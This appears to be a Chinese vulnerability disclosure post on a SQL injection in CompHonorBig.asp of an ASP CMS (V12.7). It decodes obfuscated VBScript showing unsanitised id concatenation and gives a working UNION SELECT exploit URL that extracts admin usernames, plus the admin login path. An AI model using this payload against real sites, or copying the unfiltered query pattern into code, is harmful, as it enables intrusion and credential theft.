影响版本:V12.7
漏洞类型:SQL注入
漏洞文件:CompHonorBig.asp
看到了一段代码加密:
<%@ LANGUAGE = VBScript.Encode %>
<!--#include file="Inc/conn.asp"-->
<%#@~^JgAAAA==[b:~bN@#@&k9Mn;!+dYcp;nMX?D.k o`rr[J*bgwAAA==^#~@%>
<html>
<head>
<title>图片</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<%#@~^cAAAAA==@#@&/nDPM/k+M-+MR/D lOn}4L ^YvJl9G[4cD mGD[d YE#@#@&DkRG2 xPEd VnmD~CPWMWsPZK:auW W.PStn. Pk9xJLkNB^Gx ~8~q@#@&MyMAAA==^#~@%>
<%#@~^6gAAAA==r6POMks`Dk`r/WswuWW.E*#@!@*EJ,Yt U@#@&iP,Dn/2G/nRS.kD+~E@!Nk-~mVro xEmn Y DB@*@!bho,/.m{JOMk:v./vJZKh2CKxKDE#brP8WM[+MT~@*@!z[r7@*E@#@&n^/n@#@&iPPM+k2W/nRqDrO PJ@!r:TP/M^xksoJxGwr^cL2o,Ak9Y4x+*P4nbo4Y{1+PC^Y{暂时没有图片!@*J@#@& UN,kWu0IAAA==^#~@%>
<div align="center"><BR>
<<BR">%=#@~^EwAAAA==OMkhvDk`J 6aslbxE#*eAYAAA==^#~@%><BR>
</div>
<mailto:%#@~^IgAAAA==@#@&Ddcm^W/ @#@&d+DP./{xGO4kxT@#@&8wgAAA==^#~@>
</body>
</html>
于是很好奇,其他都不加密,为什么偏偏这文件加密呢~!再看了下其他代码,都加上了防注入代码,而这个貌似没有调用到那个防注入。
于是乎,我就解密了:ODAY也随之而来。哈哈~!解密后:
<%@ LANGUAGE = VBScript %> <!--#include file="Inc/conn.asp"--> <%dim id id=request.QueryString("id")%> //接收ID参数 <html> <head> <title>图片</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <% set rs=server.CreateObject("adodb.recordset") rs.open "select * from CompHonor where id="&id,conn,1,1 %> //带入查询 <%if trim(rs("CompHonor"))<>"" then response.write "<div align=center><img src="&trim(rs("CompHonor"))&" border=0 ></div>" else response.Write "<img src=img/nopic.jpg width=65 height=96 alt=暂时没有图片!>" end if%> <div align="center"> <%=trim(rs("explain"))%> </div> <% rs.close set rs=nothing %> </body> </html> 本人疑是作者留下的后门,呵呵~!不解释。
附上EXP:
http://127.0.0.1/CompHonorBig.asp?id=11 union select 1,username,3,4,5 from admin
后台
http://127.0.0.1/admin/login.asp
修复:
过滤